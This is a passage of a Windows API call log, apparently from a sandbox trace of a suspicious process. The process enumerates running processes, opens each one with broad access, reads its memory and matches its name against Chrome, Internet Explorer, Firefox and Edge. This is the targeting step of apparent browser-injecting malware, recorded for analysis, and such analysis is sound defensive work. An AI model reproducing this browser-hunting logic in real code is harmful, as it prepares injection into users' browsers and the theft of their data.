	[0205.771] ReadProcessMemory (in: hProcess=0x2d58, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0205.771] ReadProcessMemory (in: hProcess=0x2d58, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0205.771] ReadProcessMemory (in: hProcess=0x2d58, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0205.771] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0205.772] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0205.772] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2d5c
	[0205.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.772] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0205.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.773] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0205.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.773] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0205.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.773] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.773] NtQueryInformationProcess (in: ProcessHandle=0x2d5c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0205.773] ReadProcessMemory (in: hProcess=0x2d5c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0205.774] ReadProcessMemory (in: hProcess=0x2d5c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0205.774] ReadProcessMemory (in: hProcess=0x2d5c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0205.774] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0205.774] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0205.775] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2d60
	[0205.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.775] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0205.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.775] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.775] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0205.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.776] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.776] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0205.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2d64
	[0205.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.777] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0205.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.777] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.777] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0205.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.778] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.778] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.778] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x2d68
	[0205.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.779] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.779] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.779] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.780] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.780] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.780] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.781] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2d6c
	[0205.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.781] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.782] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.782] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.782] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.782] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0205.783] CloseHandle (hObject=0x188) returned 1
	[0205.783] Sleep (dwMilliseconds=0x64) 
	[0205.890] GetCurrentProcessId () returned 0x110
	[0205.890] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0205.894] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0205.895] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0205.896] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0205.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2d70
	[0205.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.898] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.898] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.899] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.899] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.900] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0205.901] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2d74
	[0205.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.901] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.902] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.902] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.903] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.903] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0205.905] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2d78
	[0205.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.905] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0205.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.905] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.906] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0205.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.906] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.906] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0205.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2d7c
	[0205.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.907] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0205.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.907] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.908] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0205.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.908] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.908] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0205.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2d80
	[0205.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.909] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0205.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.909] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.910] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0205.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.910] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.910] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0205.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2d84
	[0205.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.911] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0205.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.911] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.912] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0205.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.912] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.912] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0205.913] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2d88
	[0205.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.913] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0205.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.913] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.913] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0205.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.914] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.914] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0205.915] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2d8c
	[0205.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.915] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0205.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.915] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.915] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0205.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.915] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.916] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2d90
	[0205.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.916] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.917] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.917] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.917] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.917] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.918] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2d94
	[0205.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.918] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.919] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.919] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.919] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.919] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.920] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2d98
	[0205.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.920] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.921] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.921] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.921] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.921] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.922] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2d9c
	[0205.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.922] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.923] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.923] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.923] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.923] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.924] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2da0
	[0205.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.924] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.924] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.925] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.925] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.925] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.926] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2da4
	[0205.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.926] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.926] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.927] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.927] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.927] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.928] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2da8
	[0205.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.928] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.928] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.929] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.929] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.929] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0205.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2dac
	[0205.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.930] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0205.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.930] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.930] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0205.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.931] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.931] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.932] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2db0
	[0205.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.932] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.932] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.932] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
